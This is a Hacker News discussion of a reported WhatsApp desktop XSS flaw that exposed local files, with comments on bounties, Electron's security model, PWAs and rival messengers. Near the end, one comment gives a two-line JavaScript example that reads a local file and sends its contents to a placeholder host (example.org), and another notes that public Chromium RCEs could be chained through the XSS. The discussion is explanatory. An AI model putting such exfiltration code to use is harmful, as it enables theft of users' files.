[HN Gopher] I found a WhatsApp security flaw that allowed hacker...
___________________________________________________________________
I found a WhatsApp security flaw that allowed hackers to read the
file system
Author : ccmpx
Score : 254 points
Date : 2020-02-04 16:35 UTC (6 hours ago)
(HTM) web link (www.perimeterx.com)
(TXT) w3m dump (www.perimeterx.com)
| kjaftaedi wrote:
| Very nice work! Also curious what kind of bounty was paid out for
| this.
| Deimorz wrote:
| The article originally said that he received a $12,500 bounty
| for it, but it looks like that's been removed now (maybe you're
| not supposed to say).
|
| You can still see it at both the top and bottom of this
| archived copy:
| https://web.archive.org/web/20200204164053/http://www.perime...
| luckydata wrote:
| half of Jeff Bezos' net worth.
| oarsinsync wrote:
| > If you're going to use Electron, you HAVE to make sure it is
| updated with each update of Chromium.
|
| I never really thought about this, but in retrospect, this is so
| blindingly obvious, and is almost certainly a potential exploit
| vector to a wide range of electron-based apps.
| lima wrote:
| It sure is. This is why Chrome apps and progressive web apps
| are great - they share the Chrome runtime and inherit its
| hardening, security properties and updates.
|
| Many Electron apps should just be a PWA instead, and many
| actually are. Why would I want to install a desktop app for
| WhatsApp? It runs just fine in Chrome, and using More Tools ->
| Create shortcut..., you can even create a launcher entry that
| will launch the page in its own window.
| randall wrote:
| This needs to be distributable by the website... also with
| caching guarantees, desktop capture support (which I think is
| there now, but wasn't till just recently) etc.
| vbezhenar wrote:
| How do I build installer for Chrome PWA? Like if user does
| not have Chrome, it should install it. Also i don't want to
| bother user with that implicitly installed chrome, so it
| should not add shortcuts, etc and just live as an app
| launcher.
| shawnz wrote:
| Don't bundle Chrome, just let the user use whatever browser
| they prefer. AFAIK Edge also supports PWAs, but not Firefox
| Desktop yet.
| onei wrote:
| Turns out a PWA works in Firefox too [1] so I'm not sure
| it's entirely necessary to force a user to install a
| browser just for your app. Edge is/will be chromium, so I
| guess Safari is the only major browser to worry about?
|
| [1] https://blog.mozilla.org/firefox/progressive-web-apps-
| whats-...
| m-p-3 wrote:
| IMO you shouldn't have to make an installer, it should be
| the browser's job to expose the feature and integrate
| itself to the OS as natively as possible.
| bitL wrote:
| Because of inability of PWA to write local files at desired
| locations (you can at best download a file), PWA's usefulness
| is limited as a desktop app replacement technology. The
| moment you allow rw local file access you are off to a
| security-fun-land.
| sayhello wrote:
| I beg to disagree :-)
|
| I've worked on the Native File System API on Chrome.
|
| It's available through Origin Trial at the moment.
|
| That said, Web apps can currently emulate reading files and
| writing to disk.
|
| Take a look at this library, which also works as a poly
| fill:
|
| https://github.com/tomayac/browser-nativefs
| bitL wrote:
| IIRC there was a feud between Chrome developers who
| wanted raw file access and Firefox ones who didn't want
| it. W3C sided with FF, so we can't build proper desktop
| apps using PWA, even if WASM makes them quite fast these
| days. Now Chrome devs resuscitated the attempt with NFS
| API, so I'll grab my popcorn and watch their interaction
| one more time...
| lima wrote:
| Right, but this is a small minority of applications.
| tonyarkles wrote:
| I strongly strongly disagree!
|
| The vast majority of the work I do can be done off-line
| with files stored on disk, minus stuff that obviously
| needs connectivity (e.g. Slack). Writing text, writing
| code, reading/editing documents and spreadsheets, doing
| CAD (mechanical and electronics), etc. During the week I
| live in the city, but on weekends and occasionally for
| longer stretches of time I like to head out to our rural
| house for peace and quiet (and focused work). Over time,
| the number of applications that _ought_ to work off-line
| has been slowly shrinking, whether it 's because they
| insist on using cloud storage instead of local storage,
| or licensing checks, or whatever. It's really really
| disappointing, and I would personally be delighted if I
| could get work done without an Internet connection.
| shawnz wrote:
| You can design a PWA that works offline with local files
| on disk already, by using the browser's file select
| dialogs. It's not necessary to give the app arbitrary
| access to the whole filesystem to get that functionality,
| which is what the parent is asking for.
| tonyarkles wrote:
| I'm genuinely not all that familiar with what PWAs can
| and can't do... Would a, for example, Word-like PWA be
| able to both load and save files to disk?
| tptacek wrote:
| The big problem with Electron isn't that it forces you to keep
| up with Chrome, although that's important too, but rather that
| it links Node.js with content-controlled Javascript, so that
| DOM corruption vulnerabilities can be leveraged for RCE, even
| in the absence of a Chrome vulnerability. Most Electron RCEs
| that you've read about had nothing to do with Chromium.
|
| There's a whole process for evaluating and auditing Electron
| applications, which is harder to do than auditing (for
| instance) a native mobile application or, probably, even a
| native desktop application.
| Invictus0 wrote:
| Can you imagine reading this comment 100 years ago?
| ASalazarMX wrote:
| They would be amazed, as this sounds like incredibly
| advanced technology, and maybe disappointed when they find
| it was all about imaginary objects in an interactive
| projector.
|
| John Titor would be proud.
| stingraycharles wrote:
| Why would they need a node process? Are there things an
| Electron app needs to do that isn't possible from the Chrome
| runtime? And more importantly, why would they need to
| directly link with the DOM?
|
| Sorry I am not very familiar with Electron.
| tptacek wrote:
| Since bridging Node.js with the DOM is basically the whole
| point of Electron, it's a little tough for me to answer
| this question. Yes, there are things Electron apps need to
| do that you can't do from standard Chrome.
| bhaavan wrote:
| I think it is a good idea to containerize all electron apps,
| and run them only in containers. It is because reducing the
| surface area of your code to the system will reduce
| vulnerabilities of your code.
| imvetri wrote:
| TLDR: 1. Altering the text of someone else's reply. 2. Altering
| banner image of someone else's reply containing links. 3,4,5.
| Good.
| Dinux wrote:
| I'm a heavy WhatsApp user and I feel like WhatsApp has gone
| downhill ever since Facebook took over. Performance is down
| significantly, I experience a lot more visible bugs, more and
| more exploits are being revealed about seemingly trivial
| components (file encryption, browser XSS), and useless features
| are beeing added. Its not like WhatsApp Inc. was flawless before
| they got acquired, but at least it worked well and most of the
| developers _actually_ wanted to make a great chat app.
|
| Its just a matter of time before Facebook merges WhatsApp with
| its Messenger (and keep either of those names).
| Stubb wrote:
| Signal and Telegram are both solid alternatives built around
| different security models. When I get a notification in
| Messenger, Instagram, etc., I simply reply back with my contact
| info for those apps. Telegram gives you a vanity URL using your
| username, which is pretty cool.
| Dinux wrote:
| Yes I am using Signal. It's just that most people around me
| are not on Signal. Trying to convince them to switch is
| useless (although I try). WhatsApp is not my first choice
| either.
| _jal wrote:
| Tell them no.
|
| My perspective is, pick one of the many overlapping
| channels we already share or don't bother me. I am not
| signing up to yet another spyware-of-the-month app in order
| to chase your fashion sense.
| roel_v wrote:
| Whatsapp has been the default choice for 10 years. From
| other people's pov, Signal and Telegram are the 'fashion'
| apps.
| kelnos wrote:
| It's a trade off. In some cases not installing the
| messaging app du jour means being left out of group
| chats. If that's ok with you, then by all means, allow
| yourself to be excluded. But that's not ok with everyone.
| meowface wrote:
| They would say the same of you, from their perspective.
| It's like someone asking you for your Twitter and you
| replying that you only use Mastodon.
| petre wrote:
| I plainly tell them to e-mail me or contact me via Wire or
| Signal.
|
| Maybe this whole Bezos affair would convince them it's
| insecure spyware from yours truly Facebook and their
| friends in the UAE? I think not.
| roywiggins wrote:
| The Signal desktop app is also Electron, isn't it?
| joecool1029 wrote:
| Correct, as of a few years ago. Previously, it used to be a
| Chrome app (I think NaCL crap?)
| roel_v wrote:
| People often say this, but I wonder if they've actually used
| those apps. For example Signal, try to back up your chat
| history. The hoops you have to jump through are not feasible
| for non-technical users. There were many more relatively
| small issues like this (I tried switching 6 months ago) but I
| forgot most.
|
| For a basic 'send text message from user A to user B' app,
| there are lots of options. Something that is as convenient as
| Whatsapp though - there are none.
| Shoetp wrote:
| I've been using Telegram for something like 5 years now.
| I'm curious, what's the problem with it?
| akerro wrote:
| How come that WhatsApp has so many security flaws recently and
| Signal isn't affected? This cannot be coincidence right? Signal
| has less people working on it, no massive corporation behind the
| product, more people as smart as Moxie working on it. I don't
| believe these flaws are just bugs... Right?
| kelnos wrote:
| Signal has a team of people behind it whose main focus is
| security and privacy. Of course everyone makes security
| mistakes, but I'd expect the Signal team to make fewer of them.
|
| In this case, I would say the fewer people working on Signal is
| a strength, not a weakness.
| bhaavan wrote:
| What is the basis of the assertion that "Signal isn't
| affected"? Do you track CVEs for Signal?
| wiredfool wrote:
| Wonder what other electron apps have issues like this, or at
| least did until they quickly updated their electron version.
| Priem19 wrote:
| Well of course you did, it's WhatsApp. That's like saying "I
| found a health concern with smoking cigarettes."
| vmchale wrote:
| sounds like the whatsapp developers are gunning to be aquihired
| by the DNC
| kome wrote:
| i'm starting to think that Durov was right after all...
| mrnobody_67 wrote:
| This is probably how the Saudi's got the data off Jeff's phone...
| boring_twenties wrote:
| You think Bezos was running the desktop/Electron app on his
| phone?
| Dinux wrote:
| He could have used the OSX desktop app. But the Bezos thing
| seems to be unrelated (as far as I can tell).
| h1fra wrote:
| wow, testing for `alert()` in a javascript environment is like
| the first thing you learn. Feels bad for whatsapp engineers :/
| dancemethis1 wrote:
| They are busy tampering with OpenWhisper.
| robocat wrote:
| Someone should create a nice little canary.js that reports on
| alert() etc being called by setting window.alert = function
| honeypotFunction(){...};. Although perhaps the noise from
| extensions and users would make the signal too useless.
| dmurray wrote:
| He didn't really demonstrate how "hackers" could read the file
| system, right? The screenshot of etc/hosts is on the same
| computer where that hosts file lives.
|
| > There are more than 5 different 1-day RCEs in Chromium 69 or
| higher, you just need to find a published one and use it through
| the persistent XSS found earlier and BAM: Remote Code Execution
| ACHIEVED!
|
| > I did not take the time to actually exploit a public RCE
|
| The XSS vulnerability is serious and looks fully deserving of a
| bug bounty. Likewise, using an old version of Electron is asking
| for trouble. But for me this PoC should include the extra step of
| "just" exploiting one of the RCE holes he's sure must exist.
| JoshTriplett wrote:
| > He didn't really demonstrate how "hackers" could read the
| file system, right? The screenshot of etc/hosts is on the same
| computer where that hosts file lives.
|
| If you can fetch arbitrary URLs, and the contents of local
| files, you can trivially exfiltrate the latter with the former.
| Just fetch the local file, then fetch an URL that encodes the
| contents of the local file. var text =
| fetch("/local/secret/file");
| fetch("https://example.org/"+encode(text));
| nebulous1 wrote:
| > He didn't really demonstrate how "hackers" could read the
| file system, right? The screenshot of etc/hosts is on the same
| computer where that hosts file lives.
|
| Are you saying he could alert it but not exfiltrate it?
___________________________________________________________________
(page generated 2020-02-04 23:00 UTC)